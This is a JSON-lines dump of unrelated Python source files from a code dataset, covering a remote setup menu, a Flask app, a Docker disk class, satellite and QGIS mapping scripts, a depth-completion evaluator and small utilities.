/tmp/DN.py\")\n\n elif int(ch) == 4:\n os.system(\"scp CNconfig.py \"+IP+\":/tmp/CN.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/CN.py\")\n\n elif int(ch) == 5:\n os.system(\"scp awslaunchinstance.py \"+IP+\":/tmp/aws.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/aws.py\")\n\n elif int(ch) == 6:\n os.system(\"scp ebsattaching.py \"+IP+\":/tmp/ebs.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/ebs.py\")\n\n elif int(ch) == 7:\n os.system(\"scp psalery.py \"+IP+\":/tmp/psalery.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/psalery.py\")\n\n elif int(ch) == 8:\n os.system(\"scp graph.py \"+IP+\":/tmp/graph.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/graph.py\")\n\n elif int(ch) == 9:\n os.system(\"scp lvm.py \"+IP+\":/tmp/lvm.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/lvm.py\")\n\n elif int(ch) == 10:\n os.system(\"scp webansible.py \"+IP+\":/tmp/ans.py\")\n os.system(\"ssh \"+IP+\" python3 /tmp/ans.py\")\n else:\n print(\"Nothing found what you are looking\")\nelse:\n print(\"Your system crash\")\n","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":9229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"337930366","text":"from .rage_entry_form import RageEntryForm\r\nfrom data import RageEntry, Rating\r\nfrom database import db\r\n\r\nfrom flask import Blueprint, render_template, redirect, url_for\r\nfrom sqlalchemy.orm import joinedload\r\n\r\nrageBlueprint = Blueprint('rage', __name__)\r\n\r\n@rageBlueprint.route('/rages/')\r\ndef list():\r\n \"\"\" Lists all rages \"\"\"\r\n rages = RageEntry.query.all()\r\n return render_template('rages/rage_list.html', rages=rages)\r\n\r\n@rageBlueprint.route('/rages/new', methods=['GET', 'POST'])\r\ndef form():\r\n \"\"\" Form for a rage \"\"\"\r\n form = RageEntryForm()\r\n form.rating_id.choices = [(x.id, x.name) for x in Rating.query.order_by('name').all()]\r\n if form.validate_on_submit():\r\n entry = RageEntry()\r\n form.populate_obj(entry)\r\n db.session.add(entry)\r\n db.session.commit()\r\n return redirect(url_for('.list'))\r\n else:\r\n return render_template('rages/rage_form.html', form=form)","sub_path":"server/rage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"76192995","text":"# Copyright 2015 Google Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Module containing classes related to DigitalOcean disks.\nAt this time, DigitalOcean does not implement any standalone disk objects,\nthe instances come with directly integrated storage.\n\"\"\"\n\nimport json\nimport logging\nimport re\n\nfrom perfkitbenchmarker import disk\nfrom perfkitbenchmarker import flags\nfrom perfkitbenchmarker import flag_util\nfrom perfkitbenchmarker import vm_util\nfrom perfkitbenchmarker import errors\nfrom perfkitbenchmarker import providers\nfrom perfkitbenchmarker import resource\nfrom perfkitbenchmarker.vm_util import OUTPUT_STDOUT as STDOUT,\\\n OUTPUT_STDERR as STDERR, OUTPUT_EXIT_CODE as EXIT_CODE\nfrom perfkitbenchmarker.configs import option_decoders\n\nFLAGS = flags.FLAGS\n\n\ndef CreateDisks(disk_specs, vm_name):\n \"\"\"\n Creates instances of KubernetesDisk child classes depending on\n scratch disk type.\n \"\"\"\n scratch_disks = []\n for disk_num, disk_spec in enumerate(disk_specs):\n\n #disk_class = GetKubernetesDiskClass(disk_spec.disk_type)\n #scratch_disk = disk_class(disk_num, disk_spec, vm_name)\n #scratch_disk.Create()\n logging.info(\"Creating Disk number: \" + str(disk_num))\n\n volume_disk = DockerDisk(disk_spec, disk_num, vm_name)\n volume_disk.Create()\n\n scratch_disks.append(volume_disk)\n return scratch_disks\n\n\nclass DockerDisk(disk.BaseDisk):\n \"\"\"Dummy Object representing a Docker Disk.\"\"\"\n # Will support additional disk functionalality later\n\n def __init__(self, disk_spec, disk_num, vm_name):\n super(DockerDisk, self).__init__(disk_spec)\n self.vm_name = vm_name\n self.disk_num = disk_num\n self.volume_name = self.vm_name + '-volume' + str(self.disk_num)\n\n def Attach(self, vm):\n pass\n\n def Detach(self):\n pass\n\n def GetDevicePath(self):\n raise errors.Error('GetDevicePath not supported for Docker.')\n\n def _Create(self):\n #volume_name = self.vm_name + '-volume' + str(self.disk_num)\n logging.info(\"Creating a new Docker Volume: \" + self.volume_name)\n\n #docker volume create volume_name\n cmd = ['docker', 'volume', 'create', self.volume_name]\n output = vm_util.IssueCommand(cmd)\n\n def _Delete(self):\n \tcmd = ['docker', 'volume', 'rm', self.volume_name]\n \toutput = vm_util.IssueCommand(cmd)\n\n def AttachVolumeInfo(self, volume_mounts):\n vol_string = (scratch_disk.volume_name + \":\" + scratch_disk.mount_point)\n\n return vol_string\n ","sub_path":"perfkitbenchmarker/providers/docker/docker_disk.py","file_name":"docker_disk.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"460230136","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import patheffects\nimport urllib2\nfrom urllib2 import Request, urlopen\nimport metpy\nfrom metpy.plots.ctables import registry\nfrom metpy.io.gini import GiniFile\nfrom siphon.catalog import TDSCatalog\nfrom netCDF4 import num2date\nimport cartopy.feature as cfeat\nimport cartopy.crs as ccrs\nimport datetime as dt\ndateZ = dt.datetime.utcnow()\ntf=open('/home/wv/time.txt')\ntf=tf.read()\ncat = TDSCatalog('http://thredds.ucar.edu/thredds/catalog/satellite/WV/EAST-CONUS_4km/current/catalog.xml')\ndataset_name = sorted(cat.datasets.keys())[-1]\ndataset = cat.datasets[dataset_name]\nremote_gini_file = urlopen(dataset.access_urls['HTTPServer'])\ngini = GiniFile(remote_gini_file)\ngini_ds = gini.to_dataset()\ndata_var = gini_ds.variables['WV']\ntime_var = gini_ds.variables['time']\nts = num2date(time_var[:].squeeze(), time_var.units)\nts2=ts.strftime('%Y-%m-%d %H:%M:%S\\n')\nif ts2==tf:\n ef=open('/home/wv/error.txt','w')\n #ef.write('Already latest @ %s'%dateZ)\n ef.write(dateZ.strftime('Already latest @ %x %H:%M:%S Z'))\n ef.close()\n raise SystemExit()\nelse:\n #fig.savefig('/home/wv/wvlatest.png',bbox_inches='tight') #,dpi=150)\n nf=open('/home/wv/time.txt','w')\n nf.write('%s'%ts2)\n nf.close()\nx = gini_ds.variables['x'][:]\ny = gini_ds.variables['y'][:]\nproj_var = gini_ds.variables[data_var.grid_mapping]\nglobe = ccrs.Globe(ellipse='sphere', semimajor_axis=proj_var.earth_radius,\n semiminor_axis=proj_var.earth_radius)\nproj = ccrs.LambertConformal(central_longitude=proj_var.longitude_of_central_meridian,\n central_latitude=proj_var.latitude_of_projection_origin,\n standard_parallels=[proj_var.standard_parallel],\n globe=globe)\nstate_boundaries = cfeat.NaturalEarthFeature(category='cultural',\n name='admin_1_states_provinces_lines',\n scale='50m', facecolor='none')\nlakes=cfeat.NaturalEarthFeature(category='physical',\n name='lakes',\n scale='10m', facecolor='none')\nfig = plt.figure(figsize=(15,13.5))\nwv_norm, wv_cmap = registry.get_with_steps('WVCIMSS', 0, 1)\n#wv_norm, wv_cmap = registry.get_with_steps('wv_tpc', 0, 1)\nax = fig.add_subplot(111,projection=proj)\nax.set_extent([-114,-86,48.5, 25], ccrs.Geodetic()) #[left,right,up,down] #[lon_0, lon_1, lat_0, lat_1])\nim = ax.imshow(data_var[:],extent=(x[0], x[-1], y[0], y[-1]), origin='upper',\n cmap=wv_cmap,norm=wv_norm)\nax.coastlines(resolution='50m')\nax.add_feature(state_boundaries)\nax.add_feature(cfeat.BORDERS, linewidth='2')\nax.add_feature(lakes)\nt=ax.text(.995,0.005,ts.strftime('%x %H:%M:%S Z'), #%d %B %Y %H:%M:%S Z\n horizontalalignment='right',verticalalignment='bottom',\n transform=ax.transAxes,fontsize=16,color='white',\n fontweight='bold')\nt.set_bbox(dict(color='black',alpha=0.65))\ng=ax.text(0.2946,0.005,dateZ.strftime('Generated @ %x %H:%M:%S Z'),\n horizontalalignment='right',verticalalignment='bottom',\n transform=ax.transAxes,fontsize=12,color='lightgray',\n fontweight='semibold')\ng.set_bbox(dict(color='black',alpha=0.65))\nfig.savefig('/home/wv/wvlatest.png',bbox_inches='tight')\n","sub_path":"wv/wv.py","file_name":"wv.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"9875936","text":"import numpy as np\n\nfrom util import auxiliary\n\n\nclass TestAuxiliary(object):\n\n def test_regression(self):\n np.random.seed(923)\n datasize = 1000\n X = np.random.random((datasize, 3))\n missX = np.zeros((datasize,3), dtype=np.bool_)\n Y = X@np.array([[.3], [.4],[.5]]) + (np.random.random((datasize,1)) - .5)\n # panel_data = np.savetxt('regress_test.csv', np.column_stack((Y,X)), delimiter=',')\n missY = np.zeros((datasize), dtype=np.bool_)\n result = auxiliary.regress(X, Y[:, 0], missX=missX, missY=missY)\n resids = Y - X@result[:,None]\n std_errors = np.sqrt(np.diag(np.linalg.inv((X.T)@X) * (np.var(resids))))\n assert np.all(np.abs(result[:,None] - np.array([[.3], [.4],[.5]])) < (1.2 * std_errors))","sub_path":"tests/auxiliary_test.py","file_name":"auxiliary_test.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"232435336","text":"import pygame\nfrom ourGlobals import *\n\nglobal walls\n\nclass Wall():\n def __init__(self, x, y, width, height):\n self.xPos = x\n self.yPos = y\n self.width = width\n self.height = height\n\n self.rect = pygame.Rect(self.xPos, self.yPos, self.width, self.height)\n walls.append(self)\n","sub_path":"pygame/RBES Tag AI/wallClass.py","file_name":"wallClass.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"386371812","text":"\"\"\"\nWrapper for Datacube.load_data\n\n\"\"\"\nfrom typing import (\n Any,\n Optional,\n Union,\n Dict,\n Callable,\n Sequence,\n)\nfrom warnings import warn\nimport xarray as xr\n\nfrom datacube import Datacube\nfrom datacube.model import Dataset\nfrom datacube.utils.geometry import GeoBox\nfrom datacube.api.core import output_geobox\n\n\ndef dc_load(\n datasets: Sequence[Dataset],\n measurements: Optional[Union[str, Sequence[str]]] = None,\n geobox: Optional[GeoBox] = None,\n groupby: Optional[str] = None,\n resampling: Optional[Union[str, Dict[str, str]]] = None,\n skip_broken_datasets: bool = False,\n chunks: Optional[Dict[str, int]] = None,\n progress_cbk: Optional[Callable[[int, int], Any]] = None,\n fuse_func=None,\n **kw,\n) -> xr.Dataset:\n \"\"\"\n Load data given a collection of datacube.Dataset objects.\n \"\"\"\n datasets = list(datasets)\n assert len(datasets) > 0\n\n # dask_chunks is a backward-compatibility alias for chunks\n if chunks is None:\n chunks = kw.pop(\"dask_chunks\", None)\n # group_by is a backward-compatibility alias for groupby\n if groupby is None:\n groupby = kw.pop(\"group_by\", \"time\")\n # bands alias for measurements\n if measurements is None:\n measurements = kw.pop(\"bands\", None)\n\n # extract all \"output_geobox\" inputs\n geo_keys = {\n k: kw.pop(k)\n for k in [\n \"like\",\n \"geopolygon\",\n \"resolution\",\n \"output_crs\",\n \"crs\",\n \"align\",\n \"x\",\n \"y\",\n \"lat\",\n \"lon\",\n ]\n if k in kw\n }\n\n ds = datasets[0]\n product = ds.type\n\n if geobox is None:\n geobox = output_geobox(\n grid_spec=product.grid_spec,\n load_hints=product.load_hints(),\n **geo_keys,\n datasets=datasets,\n )\n elif len(geo_keys):\n warn(f\"Supplied 'geobox=' parameter aliases {list(geo_keys)} inputs\")\n\n grouped = Datacube.group_datasets(datasets, groupby)\n mm = product.lookup_measurements(measurements)\n return Datacube.load_data(\n grouped,\n geobox,\n mm,\n resampling=resampling,\n fuse_func=fuse_func,\n dask_chunks=chunks,\n skip_broken_datasets=skip_broken_datasets,\n progress_cbk=progress_cbk,\n **kw,\n )\n","sub_path":"libs/stac/odc/stac/_dcload.py","file_name":"_dcload.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55809517","text":"'''\n1. 找到中点切分链表:两个指针,一个1步一个2步\n2. 将后一个链表倒序\n3. 合并\n'''\n\n\nclass Solution:\n \"\"\"\n @param head: The head of linked list.\n @return: nothing\n \"\"\"\n def reorderList(self, head):\n # write your code here\n if head is None:\n return None\n if head.next is None:\n return head\n node1 = head\n node2 = head\n while node2.next and node2.next.next:\n node1 = node1.next\n node2 = node2.next.next\n node1 = node1.next\n mid = node1\n node2 = node1.next\n while node2:\n tmp = node2.next\n node2.next = node1\n node1 = node2\n node2 = tmp\n mid.next = None\n # Now node1 is tail\n node2 = head\n while node1 and node2:\n t2 = node2.next\n t1 = node1.next\n node2.next = node1\n node1.next = t2\n node2 = t2\n node1 = t1\n if node1:\n node1.next = None\n if node2:\n node2.next = None\n return head\n \n \n \n \nfrom ListNode import LinkedList\n\nif __name__ == '__main__':\n s = Solution()\n #l = LinkedList([1, 2, 3, 4, 5, 6, 7])\n l = LinkedList([0, 1])\n head = s.reorderList(l.head)\n head.printAsList()\n ","sub_path":"Lintcode-ladder/LinkedList/reorderList.py","file_name":"reorderList.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633678506","text":"# code-checked\r\n# server-checked\r\n\r\nimport os\r\n\r\nimport torch\r\nimport torch.nn.parallel\r\nimport torch.optim\r\nimport torch.utils.data\r\nfrom torch.autograd import Variable\r\n\r\nfrom model import DepthCompletionNet\r\n\r\nfrom datasets import DatasetVirtualKITTIVal\r\nfrom criterion import MaskedL2Gauss, RMSE\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\nmodel_id = \"ensembling_virtual\"\r\nmodel_is = [0, 1, 2, 3]\r\nprint (model_is)\r\n\r\nsnapshot_dir = \"/root/evaluating_bdl/depthCompletion/training_logs/%s_%s_eval_virtual\" % (model_id, str(model_is))\r\n\r\nvirtualkitti_path = \"/root/data/virtualkitti\"\r\n\r\nbatch_size = 4\r\n\r\nif not os.path.exists(snapshot_dir):\r\n os.makedirs(snapshot_dir)\r\n\r\nmodels = []\r\nfor i in model_is:\r\n restore_from = \"/root/evaluating_bdl/depthCompletion/trained_models/%s_%d/checkpoint_40000.pth\" % (model_id, i)\r\n model = DepthCompletionNet().cuda()\r\n model = torch.nn.DataParallel(model)\r\n model.load_state_dict(torch.load(restore_from))\r\n model.eval()\r\n models.append(model)\r\n\r\nM = float(len(models))\r\nprint (M)\r\n\r\neval_dataset = DatasetVirtualKITTIVal(virtualkitti_path=virtualkitti_path)\r\neval_loader = torch.utils.data.DataLoader(dataset=eval_dataset, batch_size=batch_size, shuffle=False, num_workers=4)\r\n\r\ncriterion = MaskedL2Gauss().cuda()\r\nrmse_criterion = RMSE().cuda()\r\n\r\nbatch_losses = []\r\nbatch_rmses = []\r\nfor i_iter, batch in enumerate(eval_loader):\r\n with torch.no_grad(): # (corresponds to setting volatile=True in all variables, this is done during inference to reduce memory consumption)\r\n imgs, sparses, targets, file_ids = batch\r\n imgs = Variable(imgs.cuda()) # (shape: (batch_size, h, w))\r\n sparses = Variable(sparses.cuda()) # (shape: (batch_size, h, w))\r\n targets = Variable(targets.cuda()) # (shape: (batch_size, h, w))\r\n\r\n means = []\r\n sigma_2_aleas = []\r\n for model in models:\r\n mean, log_var = model(imgs, sparses) # (both of shape: (batch_size, 1, h, w))\r\n\r\n sigma_2_alea = torch.exp(log_var) # (sigma_alea^2) # (shape: (batch_size, 1, h, w))\r\n\r\n means.append(mean)\r\n sigma_2_aleas.append(sigma_2_alea)\r\n\r\n mean = torch.zeros(means[0].size()).cuda() # (shape: (batch_size, 1, h, w))\r\n for value in means:\r\n mean = mean + value/M\r\n\r\n sigma_2_alea = torch.zeros(means[0].size()).cuda() # (shape: (batch_size, 1, h, w)) (sigma_alea^2)\r\n for value in sigma_2_aleas:\r\n sigma_2_alea = sigma_2_alea + value/M\r\n\r\n sigma_2_epi = torch.zeros(means[0].size()).cuda() # (shape: (batch_size, 1, h, w)) (sigma_epi^2)\r\n for value in means:\r\n sigma_2_epi = sigma_2_epi + torch.pow(mean - value, 2)/M\r\n\r\n sigma_2_pred = sigma_2_alea + sigma_2_epi # (sigma_pred^2)\r\n\r\n loss = criterion(mean, torch.log(sigma_2_pred), targets)\r\n rmse = rmse_criterion(mean, targets)\r\n\r\n print('iter = {}/{} completed, loss = {}, rmse = {}'.format(i_iter, len(eval_dataset)/batch_size, loss.data.cpu().numpy(), rmse.data.cpu().numpy()))\r\n\r\n batch_losses.append(loss.data.cpu().numpy())\r\n batch_rmses.append(rmse.data.cpu().numpy())\r\n\r\n ########################################################################\r\n # visualization:\r\n ########################################################################\r\n mean = mean.data.cpu().numpy() # (shape: (batch_size, 1, h, w))\r\n sigma_2_alea = sigma_2_alea.data.cpu().numpy() # (shape: (batch_size, 1, h, w))\r\n sigma_2_epi = sigma_2_epi.data.cpu().numpy() # (shape: (batch_size, 1, h, w))\r\n sigma_2_pred = sigma_2_pred.data.cpu().numpy() # (shape: (batch_size, 1, h, w))\r\n targets = targets.data.cpu().numpy() # (shape: (batch_size, h, w))\r\n imgs = imgs.data.cpu().numpy() # (shape: (batch_size, h, w))\r\n sparses = sparses.data.cpu().numpy() # (shape: (batch_size, h, w))\r\n\r\n for i in range(mean.shape[0]):\r\n if i == 0:\r\n file_id = file_ids[i] # (file_id == \"0002/clone/00007.png\" (e.g.))\r\n file_id = file_id.split(\"/\")[-2] + \"_\" + file_id.split(\"/\")[-1] # (file_id == \"clone_00007.png\")\r\n file_id = file_id.split(\".png\")[0] # (file_id == \"clone_00007\")\r\n\r\n pred = mean[i] # (shape: (1, h, w))\r\n pred = pred.squeeze(0) # (shape: (h, w))\r\n\r\n sigma_2_alea_ = sigma_2_alea[i] # (shape: (1, h, w))\r\n sigma_2_alea_ = sigma_2_alea_.squeeze(0) # (shape: (h, w))\r\n sigma_alea = np.sqrt(sigma_2_alea_)\r\n\r\n sigma_2_epi_ = sigma_2_epi[i] # (shape: (1, h, w))\r\n sigma_2_epi_ = sigma_2_epi_.squeeze(0) # (shape: (h, w))\r\n sigma_epi = np.sqrt(sigma_2_epi_)\r\n\r\n sigma_2_pred_ = sigma_2_pred[i] # (shape: (1, h, w))\r\n sigma_2_pred_ = sigma_2_pred_.squeeze(0) # (shape: (h, w))\r\n sigma_pred = np.sqrt(sigma_2_pred_)\r\n\r\n img = imgs[i] # (shape: (h, w))\r\n img = img.astype(np.uint8)\r\n\r\n max_distance = 65.0\r\n\r\n target = targets[i] # (shape: (h, w))\r\n target[target > max_distance] = max_distance\r\n target = (target/max_distance)*255\r\n target = target.astype(np.uint8)\r\n\r\n sparse = sparses[i] # (shape: (h, w))\r\n sparse[sparse > max_distance] = max_distance\r\n sparse = (sparse/max_distance)*255\r\n sparse = sparse.astype(np.uint8)\r\n\r\n pred[pred > max_distance] = max_distance\r\n pred = (pred/max_distance)*255\r\n pred = pred.astype(np.uint8)\r\n\r\n sparse_color = cv2.applyColorMap(sparse, cv2.COLORMAP_SUMMER)\r\n sparse_color[sparse == 0] = 0\r\n\r\n target_color = cv2.applyColorMap(target, cv2.COLORMAP_SUMMER)\r\n target_color[target == 0] = 0\r\n\r\n pred_color = cv2.applyColorMap(pred, cv2.COLORMAP_SUMMER)\r\n\r\n max_interval_length = 75.0 # (corresponds to the maximum length of a 95% conf interval)\r\n max_sigma = max_interval_length/(2.0*1.96)\r\n\r\n sigma_alea[sigma_alea > max_sigma] = max_sigma\r\n sigma_alea = (sigma_alea/max_sigma)*255\r\n sigma_alea = sigma_alea.astype(np.uint8)\r\n sigma_alea_color = cv2.applyColorMap(sigma_alea, cv2.COLORMAP_HOT)\r\n\r\n sigma_epi[sigma_epi > max_sigma] = max_sigma\r\n sigma_epi = (sigma_epi/max_sigma)*255\r\n sigma_epi = sigma_epi.astype(np.uint8)\r\n sigma_epi_color = cv2.applyColorMap(sigma_epi, cv2.COLORMAP_HOT)\r\n\r\n sigma_pred[sigma_pred > max_sigma] = max_sigma\r\n sigma_pred = (sigma_pred/max_sigma)*255\r\n sigma_pred = sigma_pred.astype(np.uint8)\r\n sigma_pred_color = cv2.applyColorMap(sigma_pred, cv2.COLORMAP_HOT)\r\n\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_img.png\", img)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_sparse_color.png\", sparse_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_target_color.png\", target_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_pred_color.png\", pred_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_sigma_alea_color.png\", sigma_alea_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_sigma_epi_color.png\", sigma_epi_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_sigma_pred_color.png\", sigma_pred_color)\r\n\r\n # # # # # # # # # # # # # # # # # # debug START:\r\n # if i_iter > 0:\r\n # break\r\n # # # # # # # # # # # # # # # # # # debug END:\r\n\r\nval_loss = np.mean(batch_losses)\r\nprint (\"val loss: %g\" % val_loss)\r\nval_rmse = np.mean(batch_rmses)\r\nprint (\"val rmse: %g\" % val_rmse)\r\n","sub_path":"depthCompletion/ensembling_eval_virtual.py","file_name":"ensembling_eval_virtual.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"412198876","text":"import os # library used to manipulate path names and directories\r\nimport glob # allows for all files in a certain directory to be targeted\r\nimport fnmatch\r\nfrom qgis.core import (QgsFeature, QgsField, QgsFields,\r\n QgsGeometry, QgsPoint, QgsVectorFileWriter)\r\n\r\n\r\nproject = QgsProject.instance()\r\n\r\nprehistoric_data= \"file:///C:/Users/ADMIN/Desktop/Data/Site_type/prehistoric_data.csv\"\r\n \r\narchaeo_search_terms = ['Broch', 'Bank', 'Building', 'Burnt Mound', 'Dyke', 'Cairnfield', 'Clearence Cairn', \r\n'Chambered Cairn', 'Kerb Cairn', 'Burial Cairn', 'Dun', 'Enclosure', 'Field Boundary', 'Field System', \r\n'House', 'Hut Circle', 'Lithic Working Site', 'Long Cairn', 'Quarry', 'Ritual Building', 'Souterrain', \r\n'Standing Stone', 'Stone Heap', 'Stone Row', 'Stone Setting', 'Settlement (Prehistoric)', \r\n'Settlement (Neolithic)', 'Settlement (Bronze Age)', 'Settlement (Iron Age)', 'Wall']\r\n\r\nlayer_colours = [ '#1f78b4', '#a6cee3', '#b2df8a', '#33a02c', '#fb9a99', '#e31a1c', '#fdbf6f', '#ff7f00', \r\n'#00fffb', '#f7ff00', '#ff00d9', '#4000ff', '#ff0c00', '#713a48', '#71ee48', '#cdee48', '#ee48c2', '#ee4803', \r\n'#e3bbee', '#3a7141', '#82a11c', '#82a1f1', '#f19e82', '#0928f1', '#c44f6a', '#4fc461', '#08160a', '#b430c2', \r\n'#9bc230', '#ff9a3c']\r\n\r\nlayer_shapes = [ 'circle', 'square', 'triangle', 'diamond', 'circle', 'square', 'triangle', 'diamond', 'circle', \r\n'square', 'triangle', 'diamond', 'circle', 'square', 'triangle', 'diamond', 'circle', 'square', 'triangle', 'diamond', \r\n'circle', 'square', 'triangle', 'diamond', 'circle', 'square', 'triangle', 'diamond', 'circle', 'square']\r\n\r\n# this line purges the layers panel to stop it becoming clutered\r\nproject.removeAllMapLayers()\r\n\r\n# this empties the directory geoprogramming, just for housekeeping\r\nfiles = glob.glob('C:/Users/ADMIN/Desktop/Data/geoprogramming/*')\r\nfor f in files:\r\n os.remove(f)\r\n\r\n# the outline of the island the points fall within, the context for the map (this could be a raster)\r\ncontour_map = QgsVectorLayer(\"C:/Users/ADMIN/Desktop/Data/Site_type/shapefiles/Unst50metre.shp\", \"Unst contours\", \"ogr\")\r\n# this routine merely vaidates the shp file entry\r\nif not unst_contour_map.isValid():\r\n print(\"Layer failed to load!\")\r\n\r\nreproj_contour_map = processing.run('native:reprojectlayer', {'INPUT': contour_map,\r\n 'TARGET_CRS': 'EPSG:4326',\r\n 'OUTPUT': 'memory:'})['OUTPUT']\r\n\r\n# these next two blocks of code rename the output layers in the table of contents\r\nproject.addMapLayer(reproj_contour_map)\r\nto_be_renamed = project.mapLayersByName('output')[0]\r\nto_be_renamed.setName('Contour_map')\r\n\r\n# this line sets the uri, the information about the crs and encoding\r\nuri = prehistoric_data + \"?encoding=%s&delimiter=%s&xField=%s&yField=%s&crs=%s\" % (\"UTF-8\",\",\", \"SITE EASTING\", \"SITE NORTHING\",\"epsg:27700\")\r\npre_hist_data = QgsVectorLayer(uri,'Points', 'delimitedtext')\r\nprint(pre_hist_data.isValid())\r\n# this adds the layer to the map, for some reason it has to be added, even though it is an intermediate step, it is deleated later\r\npre_hist_data = iface.addVectorLayer(uri,'Brochs','delimitedtext')\r\n\r\n# this procecing script reprojects the layer into epsg 4326, now all layers are in the same projection\r\nreproj_pre_hist_data = processing.run('native:reprojectlayer', {'INPUT': pre_hist_data,\r\n 'TARGET_CRS': 'EPSG:4326',\r\n 'OUTPUT': 'memory:'})['OUTPUT']\r\n \r\n\r\n# the reprojection is added\r\nproject.addMapLayer(reproj_pre_hist_data)\r\n# the reprojection is renamed\r\nto_be_renamed = project.mapLayersByName('output')[0]\r\nto_be_renamed.setName('Prehistoric_data')\r\n\r\n#just to check what is in the table of contents, the layer names are printed to the console\r\nlayers_names = []\r\nfor layer in QgsProject.instance().mapLayers().values():\r\n layers_names.append(layer.name())\r\n\r\nprint(\"layers TOC = {}\".format(layers_names))\r\n\r\n# the target layer that will be divided, or selected, by the search terms is defined\r\nlayer = reproj_pre_hist_data\r\n\r\nfor index, item in enumerate (archaeo_search_terms):\r\n \r\n # the LIKE operator acts like the word contains, the % signs are wildcards so allow the term to appear anywhere\r\n # by using formatting a variable can be used as the search term\r\n layer.selectByExpression('\"SITE TYPE\" LIKE \\'%{}%\\''.format(item),QgsVectorLayer.SetSelection)\r\n\r\n selection = layer.selectedFeatures()\r\n\r\n #if there is any information in the selection, create a geopackage and write the vector to the map\r\n if (len(selection) > 0):\r\n file_name = 'C:/Users/ADMIN/Desktop/Data/geoprogramming/{}.gpkg'.format(item)\r\n writer = QgsVectorFileWriter.writeAsVectorFormat(layer, file_name, 'utf-8', driverName = 'GPKG', onlySelected = True)\r\n \r\n selected_layer = iface.addVectorLayer(file_name, item, 'ogr')\r\n \r\n # these two lines take the symbol and colour at the relevant spot and applies it to the layer\r\n symbol = QgsMarkerSymbol.createSimple({'name': layer_shapes[index], 'color': layer_colours[index]})\r\n selected_layer.renderer().setSymbol(symbol)\r\n # make the change actual for the layer\r\n selected_layer.triggerRepaint()\r\n \r\n #this line updates the layer tree symbology as each layer's symbols are changed\r\n iface.layerTreeView().refreshLayerSymbology( iface.activeLayer().id() )\r\n \r\n project.addMapLayer(selected_layer)\r\n del(writer)\r\n\r\nQCoreApplication.processEvents()\r\n\r\n# these lines clear the table of contents of unnecessary layers\r\nroot = project.layerTreeRoot()\r\n\r\nroot.removeLayer(reproj_pre_hist_data)\r\nroot.removeLayer(pre_hist_data)\r\n\r\n\r\n##############################################\r\n#this part of the script creates a map from the results of the foregoing part of the script\r\n#############################################################\r\n\r\nproject = QgsProject.instance() \r\nmanager = project.layoutManager()\r\nlayout = QgsPrintLayout(project) \r\nlayoutName = \"PrintLayout\"\r\nlayout.setName('Prehistoric archaeology on Unst, Shetland, Scotland') \r\n\r\nlayouts_list = manager.printLayouts()\r\n\r\nfor layout in layouts_list:\r\n if layout.name() == layoutName:\r\n manager.removeLayout(layout)\r\n\r\nlayout = QgsPrintLayout(project)\r\nlayout.initializeDefaults() #create default map canvas\r\nlayout.setName(layoutName)\r\nmanager.addLayout(layout)\r\n\r\n\r\n\r\n# Map\r\n# Defaults of `A4`, `Landscape`, & `LayoutMillimeters` are \r\n# due to `layout.initializeDefaults()`\r\nmap = QgsLayoutItemMap(layout)\r\nmap.setRect(QRectF(20, 20, 200, 100)) # The Rectangle will be overridden below\r\n\r\n\r\n# sets the extent to the extent of the named layer\r\nmap.setExtent(reproj_contour_map.extent())\r\n\r\n\r\nlayout.addLayoutItem(map)\r\n\r\n#Move & Resize\r\nmap.attemptMove(QgsLayoutPoint(15, 35, QgsUnitTypes.LayoutMillimeters))\r\nmap.attemptResize(QgsLayoutSize(200, 160, QgsUnitTypes.LayoutMillimeters))\r\n\r\n#Checks layer tree objects and stores them in a list. This includes csv tables\r\nchecked_layers = [layer.name() for layer in QgsProject().instance().layerTreeRoot().children() if layer.isVisible()]\r\nprint(f\"Adding {checked_layers} to legend.\" )\r\n#get map layer objects of checked layers by matching their names and store those in a list\r\nlayersToAdd = [layer for layer in QgsProject().instance().mapLayers().values() if layer.name() in checked_layers]\r\nroot = 